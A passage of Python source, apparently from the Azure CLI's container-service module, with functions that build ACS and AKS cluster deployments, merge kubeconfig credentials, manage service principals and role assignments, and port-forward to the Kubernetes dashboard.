"osDiskSizeGB": int(master_osdisk_size),
"vnetSubnetID": master_vnet_subnet_id,
"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm'
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for the agent pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The administration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
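# Illustrative call of acs_create (all values are placeholders):
#   acs_create(cmd, client,
#              resource_group_name='my-rg',
#              deployment_name='acs-deploy-1',
#              name='my-acs',
#              ssh_key_value='ssh-rsa AAAA... user@host',
#              orchestrator_type='Kubernetes',
#              service_principal='<appId>',
#              client_secret='<secret>')
# With a Kubernetes orchestrator the service principal branch above runs
# (via _ensure_service_principal); for other orchestrators it is skipped
# and --windows is rejected.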
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType, get_sdk
DeploymentProperties = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'DeploymentProperties', mod='models')
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n, NoTTYException
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
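# Usage sketch (paths are hypothetical): merge a freshly downloaded kubeconfig into the
# default config, overwriting entries with the same name instead of prompting:
#
#   merge_kubernetes_configurations(os.path.expanduser('~/.kube/config'),
#                                   '/tmp/downloaded.kubeconfig', replace=True)
#
# On success the existing file is rewritten in place and the merged current context is printed.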
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
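# Example (illustrative, not part of the CLI): suffix a DNS prefix with six random characters.
#
#   suffix = _rand_str(6)              # e.g. 'a3k9z1'
#   dns_prefix = 'myaks-' + suffix     # hypothetical use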
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
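# Note: on Python 3 this behaves roughly like os.makedirs(path, exist_ok=True); the EEXIST
# branch only swallows the error when the pre-existing path is a directory. For example:
#
#   _mkdir_p(os.path.expanduser('~/.kube'))   # no-op if ~/.kube already exists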
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds,
required_resource_access=required_resource_accesses)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def update_application(client, object_id, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None, required_resource_accesses=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
try:
if key_creds:
client.update_key_credentials(object_id, key_creds)
if password_creds:
client.update_password_credentials(object_id, password_creds)
if reply_urls:
client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls))
return
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
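# Sketch (illustrative values): build a password credential that is valid for one year.
#
#   password_creds, key_creds = _build_application_creds(password='s3cret!')
#   # password_creds -> [PasswordCredential(start_date=utcnow, end_date=utcnow + 1 year, ...)]
#   # key_creds      -> None (password and key-value are mutually exclusive)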
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
            if not result:  # assume identifier is an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope)
def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
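# Examples of the scopes this produces (subscription id is illustrative):
#
#   _build_role_scope(None, None, 'sub-id')    -> '/subscriptions/sub-id'
#   _build_role_scope('myRG', None, 'sub-id')  -> '/subscriptions/sub-id/resourceGroups/myRG'
#   _build_role_scope('myRG', '/subscriptions/sub-id', 'sub-id')  -> CLIError (scope makes the group redundant)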
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
# pylint: disable=too-many-statements
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False,
listen_address='127.0.0.1', listen_port='8001'):
if not which('kubectl'):
        raise CLIError('Cannot find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = '{0}://{1}:{2}/'.format(protocol, listen_address, listen_port)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{}'.format(term_id),
json={"url": result['url']})
logger.warning('To view the console, please open %s in a new tab', result['url'])
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(proxy_url)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", "--address", listen_address, dashboard_pod,
"{0}:{1}".format(listen_port, dashboard_port)], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
                if b'unknown flag: --address' in err.output:
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", dashboard_pod, "{0}:{1}".format(listen_port, dashboard_port)])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
            requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
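# Roughly, aks_browse is equivalent to the following manual steps (values illustrative):
#
#   az aks get-credentials -g myRG -n myAKS -f /tmp/kubeconfig
#   kubectl --kubeconfig /tmp/kubeconfig --namespace kube-system get pods \
#       --selector k8s-app=kubernetes-dashboard --output name
#   kubectl --kubeconfig /tmp/kubeconfig --namespace kube-system port-forward \
#       --address 127.0.0.1 <dashboard-pod> 8001:<dashboard-container-port>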
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_count=3,
nodepool_name="nodepool1",
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
attach_acr=None,
no_wait=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = _set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
